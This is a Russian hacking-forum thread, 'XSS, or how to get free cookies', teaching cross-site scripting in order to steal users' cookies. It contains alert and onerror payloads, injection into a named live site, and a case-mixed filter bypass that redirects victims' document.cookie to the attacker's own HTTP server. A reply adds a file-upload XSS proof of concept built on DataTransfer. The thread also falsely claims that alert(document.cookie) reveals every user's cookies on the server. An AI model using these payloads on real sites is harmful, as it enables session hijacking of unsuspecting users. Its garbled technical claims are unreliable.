Интересно XSS, или как получить халявные cookie Ч1.

9779

Original poster
Pro Member
Сообщения
83
Реакции
21
Посетить сайт
XSS, или как получить халявные cookie
1623090620566.png
XSS - опаснейшая уязвимость веб приложений по мнению ведущих it империй и крупных лабораторий кибербезопасности.
qwasp, google, mozilla, apple, kaspersky, и многие другие нанимают целые кибервойска для защиты своих систем.
а нам че, а мы научимся)
на каждом сайте в интернете есть поля ввода, input'ы . и на многих сайтах есть критическая уязвимость, с помощью которой можно задавать js команды прямо в input. пример такой атаки:

<script>alert('9779')</script>

вместо алерта можно вставить любой js код,. но это только начало. если скрипт выше не сработает, попробуем еще один способ. есть у нас условный месcенджер, и он нам до жути не нравится. можно применить такую штуку:

<img src="/" anerror="alert('done')"/>

кстати, строка ввода url тоже считается за input поэтому можно применить вот такую штуку(на момент окончания написания мануала уязвимость была погашенна)

https://otvetkin.info'onerror="alert('done');"

Круто, да? но что нам дают эти алерты?
А теперь поговорим про куки)

alert(document.cookie);

при вводе этого, мы получаем куки всех пользователей на сервере, и нам выбросится уведомление с ними. но можно отсортировать поиск:

JavaScript:
document.cookie = "user=John";
alert(document.cookie);
вы увидите огромное количество куков, я уверяю.
// специальные символы (пробелы), требуется кодирование
let name = "my name";
let value = "John Smith"

// кодирует в my%20name=John%20Smith
document.cookie = encodeURIComponent(name) + '=' + encodeURIComponent(value);

alert(document.cookie); // ...; my%20name=John%20Smith

Надеюсь, что вам понравилась статья, и вы ее дочитали))
Вопросы По статье писать @Pickmoonpeek или @notAHackerRealy в телеграм
Скоро 2 часть!)
 
  • Like
Реакции: Admin

AngelXXXanax

Member
Сообщения
5
Реакции
9
Посетить сайт
XSS, или как получить халявные cookie
Посмотреть вложение 5442
XSS - опаснейшая уязвимость веб приложений по мнению ведущих it империй и крупных лабораторий кибербезопасности.
qwasp, google, mozilla, apple, kaspersky, и многие другие нанимают целые кибервойска для защиты своих систем.
а нам че, а мы научимся)
на каждом сайте в интернете есть поля ввода, input'ы . и на многих сайтах есть критическая уязвимость, с помощью которой можно задавать js команды прямо в input. пример такой атаки:

<script>alert('9779')</script>

вместо алерта можно вставить любой js код,. но это только начало. если скрипт выше не сработает, попробуем еще один способ. есть у нас условный месcенджер, и он нам до жути не нравится. можно применить такую штуку:

<img src="/" anerror="alert('done')"/>

кстати, строка ввода url тоже считается за input поэтому можно применить вот такую штуку(на момент окончания написания мануала уязвимость была погашенна)

https://otvetkin.info'onerror="alert('done');"

Круто, да? но что нам дают эти алерты?
А теперь поговорим про куки)

alert(document.cookie);

при вводе этого, мы получаем куки всех пользователей на сервере, и нам выбросится уведомление с ними. но можно отсортировать поиск:


JavaScript:
document.cookie = "user=John";
alert(document.cookie);
вы увидите огромное количество куков, я уверяю.
// специальные символы (пробелы), требуется кодирование
let name = "my name";
let value = "John Smith"

// кодирует в my%20name=John%20Smith
document.cookie = encodeURIComponent(name) + '=' + encodeURIComponent(value);

alert(document.cookie); // ...; my%20name=John%20Smith

Надеюсь, что вам понравилась статья, и вы ее дочитали))
Вопросы По статье писать @Pickmoonpeek или @notAHackerRealy в телеграм
Скоро 2 часть!)
Опять я решил доёбаться) Так вот! Можно сделать намного лучше. На многих сайтах уже давно есть фильтрация:
PHP:
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

 $isempty = true;

} else {

 echo '<pre>';
 echo 'Hello ' . str_replace('<script>', '', $_GET['name']); // Это самое главное так как идет фильтрация строк <script>
 echo '</pre>';

}

?>


И если человек работает на линуксе он может пробросить прокси после чего запустить python -m http.server 1337:
photo_2021-06-07_17-16-40.jpg
Теперь для самого xss надо написать на моем примере <ScRipT>window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie</ScRIpt> Где <ScrIpT> такими буквами это обход классической защиты от xss.

Эта строка window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie нужна для отправления cookie пользователей на твой сайт в моем примере 127.0.0.1. А вот и результат:
photo_2021-06-07_17-24-08.jpg
 
  • Like
Реакции: Admin и 9779

AngelXXXanax

Member
Сообщения
5
Реакции
9
Посетить сайт
Опять я решил доёбаться) Так вот! Можно сделать намного лучше. На многих сайтах уже давно есть фильтрация:
PHP:
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

$isempty = true;

} else {

echo '<pre>';
echo 'Hello ' . str_replace('<script>', '', $_GET['name']); // Это самое главное так как идет фильтрация строк <script>
echo '</pre>';

}

?>


И если человек работает на линуксе он может пробросить прокси после чего запустить python -m http.server 1337:
Посмотреть вложение 5443
Теперь для самого xss надо написать на моем примере <ScRipT>window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie</ScRIpt> Где <ScrIpT> такими буквами это обход классической защиты от xss.

Эта строка window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie нужна для отправления cookie пользователей на твой сайт в моем примере 127.0.0.1. А вот и результат:
Посмотреть вложение 5444
Ещё интересная тема это Reflected XSS via File Upload. На первый взгляд, кажется простой задачей. Но оказывается, что подсунуть пользователю отправку произвольного файла из браузера без действий пользователя не так уж просто. Нам всегда в таком случае надо чтобы пользователь открыл страницу, после из JS создать на странице форму с уже подставленным файлом, и после перенаправить его на уязвимую страницу вместе с загруженными данными. В этом случае ни как не помогут ни XMLHttpRequest, ни fetch, о которых вы сначала могли подумать. Но! Для содержания файлов объект input имеет поле input.files, которое представляет собой объект FileList. И до какого-то времени мы не могли его изменять (он считался immutable) и создавать кастомные FileList объекты, кроме возможности изменять его через объекты полученные из события DataTransferEvent (Т.е. когда юзер сам перетаскивал файлы на экран). Но в 17 году ребята обнаружили возможность вызывать конструктор объекта DataTransfer , который порождает изменяемый объект FileList, который мы можем наполнить своими произвольными файлами из кода JS. Вот простой пример:
JavaScript:
<!DOCTYPE html>
<html>
<body>
 <form id="" action="https://example.com/convert-file" method="POST" enctype="multipart/form-data">
  <input id="file" type="file" name="file"/>
  "/>
 </form>

 <script>
  class _DataTransfer {
    constructor() {
     return new ClipboardEvent("").clipboardData || new DataTransfer();}
  }

  const input = document.querySelector('input');
  const file = new File(['<img onerror="alert(\'Domain: \'+document.domain+\'" src="x" />'],"name.html",{type:"text/html"})

  const dt = new _DataTransfer();

  dt.items.add(file)

  input.files = dt.files;

  document.forms[0].submit();
 </script>
</body>
</html>
 
  • Like
Реакции: Admin и 9779

NothingButAnything

New Member
Сообщения
1
Реакции
0
Посетить сайт
Опять я решил доёбаться) Так вот! Можно сделать намного лучше. На многих сайтах уже давно есть фильтрация:
PHP:
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

$isempty = true;

} else {

echo '<pre>';
echo 'Hello ' . str_replace('<script>', '', $_GET['name']); // Это самое главное так как идет фильтрация строк <script>
echo '</pre>';

}

?>


И если человек работает на линуксе он может пробросить прокси после чего запустить python -m http.server 1337:
Посмотреть вложение 5443
Теперь для самого xss надо написать на моем примере <ScRipT>window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie</ScRIpt> Где <ScrIpT> такими буквами это обход классической защиты от xss.

Эта строка window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie нужна для отправления cookie пользователей на твой сайт в моем примере 127.0.0.1. А вот и результат:
Посмотреть вложение 5444
cпасибо, очень интересно
 

9779

Original poster
Pro Member
Сообщения
83
Реакции
21
Посетить сайт
Опять я решил доёбаться) Так вот! Можно сделать намного лучше. На многих сайтах уже давно есть фильтрация:
PHP:
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

$isempty = true;

} else {

echo '<pre>';
echo 'Hello ' . str_replace('<script>', '', $_GET['name']); // Это самое главное так как идет фильтрация строк <script>
echo '</pre>';

}

?>


И если человек работает на линуксе он может пробросить прокси после чего запустить python -m http.server 1337:
Посмотреть вложение 5443
Теперь для самого xss надо написать на моем примере <ScRipT>window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie</ScRIpt> Где <ScrIpT> такими буквами это обход классической защиты от xss.

Эта строка window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie нужна для отправления cookie пользователей на твой сайт в моем примере 127.0.0.1. А вот и результат:
Посмотреть вложение 5444
опять ты решил доебаться)))) за штуку с php кстати большое спасибо)) я не знал если честно
 

9779

Original poster
Pro Member
Сообщения
83
Реакции
21
Посетить сайт
Но в 17 году ребята обнаружили возможность вызывать конструктор объекта DataTransfer , который порождает изменяемый объект FileList, который мы можем наполнить своими произвольными файлами из кода JS. Вот простой пример:
Это имба получается)
 

x2x_

New Member
Сообщения
1
Реакции
0
Посетить сайт
Опять я решил доёбаться) Так вот! Можно сделать намного лучше. На многих сайтах уже давно есть фильтрация:
PHP:
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

 $isempty = true;

} else {

 echo '<pre>';
 echo 'Hello ' . str_replace('<script>', '', $_GET['name']); // Это самое главное так как идет фильтрация строк <script>
 echo '</pre>';

}

?>


И если человек работает на линуксе он может пробросить прокси после чего запустить python -m http.server 1337:
Посмотреть вложение 5443
Теперь для самого xss надо написать на моем примере <ScRipT>window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie</ScRIpt> Где <ScrIpT> такими буквами это обход классической защиты от xss.

Эта строка window.location='

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

' + document.cookie нужна для отправления cookie пользователей на твой сайт в моем примере 127.0.0.1. А вот и результат:
Посмотреть вложение 5444
<img src="" onerror="alert(1)"> ....?
 
Название темы
Автор Заголовок Раздел Ответы Дата
F XSS - Сборник инструментов Уязвимости и взлом 0
Forevonly Руководство по применению: как обойти XSS-фильтры Полезные статьи 0
klobald Уроки по XSS: Урок 3. Контексты внедрения XSS Уязвимости и взлом 0
klobald Уроки по XSS: Урок 2. Скрытая передача данных, перехват нажатия клавиш, изменение внешнего вида сайта, подцепление на BeEF, фишинг, подсказки обхода ф Уязвимости и взлом 0
klobald Уроки по XSS: Урок 1. Основы XSS и поиск уязвимых к XSS сайтов Уязвимости и взлом 0
Forevonly Skipfish - Сканер безопасности веб-приложений для определения XSS, SQL инъекции, а также Shell инъекции Kali Linux 0
X нашел xss , что делать дальше? Вопросы и интересы 0
Admin XSS атаки с помощью Referer'а Уязвимости и взлом 0
ins1der Инжектим скрипт beef используя XSS Полезные статьи 4
Admin Приключения xss векторов в необычных местах Уязвимости и взлом 0
pw0ned Golden-Bird.biz XSS Другое 4
Admin Cyber Industries - Активная XSS Уязвимости и взлом 0
Admin Выжимаем максимум пользы от XSS Уязвимости и взлом 1
Admin Hotmail - xss Уязвимости и взлом 0
Admin Mail ru - xss Уязвимости и взлом 1
D Как поставить лайк? или убрать хайд? может ли не показываться кнопка лайка? Вопросы и интересы 0
piratabuhta Продам Продаю юзанные комплекты(права,айди карты с двух сторон) по Сша без селфи или с селфи Аккаунты/Админки/Документы 9
M Германия.В продаже юзанные комплекты вместе с селфи или без селфи(смотрите видео доказательство). Корзина 0
M В продаже юзанные украинские айди карты с двух сторон с селфи или без селфи+прописка(смотрите видео доказательство). Корзина 0
M В продаже юзанные рф комплекты вместе с селфи или без селфи(смотрите видео доказательство). Корзина 0
Z Мне нужно купить веб -оболочку или cpanel Корзина 1
A Куплю доступ в призму или солярис Аккаунты/Админки/Документы 1
Deni4ka Куплю Брут акки или акки с токенами от Chaturbate Аккаунты/Админки/Документы 2
V Куплю Ищу ТОО или ИП Казахстан Куплю/Обменяю 1
fx7support Подарок акция до 20000 руб. или месяц бесплатно. Тинькофф Инвестиции. Другое 0
wallet_dat Продам Утерянный или забытый пароль кошельков Bitcoin core Куплю/Обменяю 96
B Интересно можно ли брутфорсить инстаграм или гмейл в 2022 ? Куплю/Обменяю 0
DIPHENY Нужен человек с банком Левобережный или Faktura Способы заработка 0
JDev Мобильные LTE прокси или анонимные ipv4: преимущества и недостатки каждого типа прокси SSH / дедики / Vpn / Proxy / Socks 21
fx7support Партнерка «Секс по телефону по предоплате» или «обратный звонок» Способы заработка 1
M Куплю Куплю или залью симкарты Тинькофф Мобайл. Куплю/Обменяю 2
S Коронавирус - реальная угроза или манипуляции? Свободное общение и флейм 4
mickey7091 Даю разовые или постоянные работы отрисовщикам(общий бюджет 500 долларов-смотрите видео доказательство). Предоставляю работу. Ищу специалиста. 4
slovokek Куплю Скуплю или отработаю логи БА ЮСА! Куплю/Обменяю 0
slovokek ищу трафферов фб или гугл Предоставляю работу. Ищу специалиста. 0
Config Куплю Реализую ваши аккаунты с почтой у себя в интернет магазине. Гарантия ~10 дней или верну аккаунт Куплю/Обменяю 0
Р Интересно Способ вывода с Binance и других бирж без верификации по СМС или 2FA Способы заработка 0
S Услуги Хакера Заказать Whatsapp,Viber,Telegram,Vk Связь с нами - [email protected] Всем Добрый день Интересует услуга взлома вашего Врага или же Корзина 0
AngelXXXanax Солевой генний или как пройти CTF Odin: 1 Полезные статьи 1
I Emacs VM или termux для программирования Свободное общение и флейм 0
9779 Интересно MST-или деанон через ссылку. Полезные статьи 12
abc11 Куплю Куплю dating отклик и базы email adult или dating направленности Куплю/Обменяю 1
S Дурак или Умный. Кому жить проще? Свободное общение и флейм 4
V Андрей Комбат «Начало пути или заработай в сети» 2.0 Способы заработка 2
Aleksandr Log Куплю Куплю свои запросы в ваших новых и/или отработанных USA логах Куплю/Обменяю 1
Ricardo Milos Продам Пластиковые карты Qiwi | ЮMoney, отправка СДЭК или фото пластика Финансы - биллинги, банки, кошельки, логи 0
H SMM за 100.000 или как получить пассивный доход (2021) Способы заработка 0
Р Интересно 1000 рублей на Delivery Club HONOR 10X Lite или HUAWEI P smart Способы заработка 0
B Купить или продать биткоин за рубли без регистрации Berukriptu.ru Обменники 0
st.ap Подскажите курсы или уроки по вирусописанию Вопросы и интересы 2

Название темы